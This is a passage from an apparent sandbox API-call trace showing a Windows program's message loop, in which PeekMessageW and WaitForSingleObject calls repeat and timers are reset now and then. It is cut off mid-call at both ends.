0x102 [0137.982] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.982] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0138.009] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0138.009] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0138.015] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0138.015] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0138.029] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0138.029] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0138.045] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0138.045] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0138.061] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0138.061] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0138.076] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0138.076] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0138.092] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0138.092] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0138.107] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0138.107] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0138.123] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0138.123] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0138.138] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0138.138] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0138.154] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0138.154] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0138.170] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0138.170] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0138.185] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0138.185] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0138.201] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0138.201] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0138.216] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0138.216] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0138.232] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0138.232] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0138.248] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0138.248] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0138.264] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0138.264] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.272] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.272] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.277] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.277] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.293] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0139.293] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0139.293] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0139.293] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0139.293] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0139.293] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.293] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.308] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.308] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.325] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.325] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.340] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.340] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.355] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.355] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.371] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.371] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.386] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.386] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.402] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.402] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.417] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.418] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.433] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.433] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.449] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.451] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.464] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.464] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.480] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.480] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.496] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.496] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.511] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.511] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.527] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.527] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.542] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.542] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.558] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.558] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.573] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.574] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.590] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.590] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.605] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.605] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.620] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.620] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.642] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.642] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.652] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.652] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.667] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.667] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.684] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.684] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.699] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.699] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.714] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.714] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.729] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.729] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.745] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.745] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.761] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.761] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.776] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.776] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.792] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.792] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.808] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.808] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.824] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.824] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.839] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.839] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.854] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.854] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.870] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.870] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.885] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.885] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.901] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.901] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.917] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.917] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.932] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.933] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.950] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.950] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.964] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.964] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.979] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.979] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0139.995] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0139.995] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.010] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.010] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.026] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.026] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.041] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.041] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.057] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0140.057] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0140.057] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0140.057] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0140.057] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0140.057] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.057] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.073] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.073] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.088] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.088] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.104] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.104] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.119] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.120] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.135] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.135] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.151] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.151] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.166] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.166] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.182] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.182] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.197] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.197] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.213] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.213] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.229] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.229] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.244] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.245] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.260] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.260] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.283] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.283] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.291] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.291] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.307] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.307] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.322] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.322] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.338] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.338] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.354] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.354] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.369] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.369] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.385] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.385] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.400] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.400] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.416] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.416] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.431] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.432] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.447] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.447] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0140.463] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.463] WaitForSingleObject (hHandle=0x168, 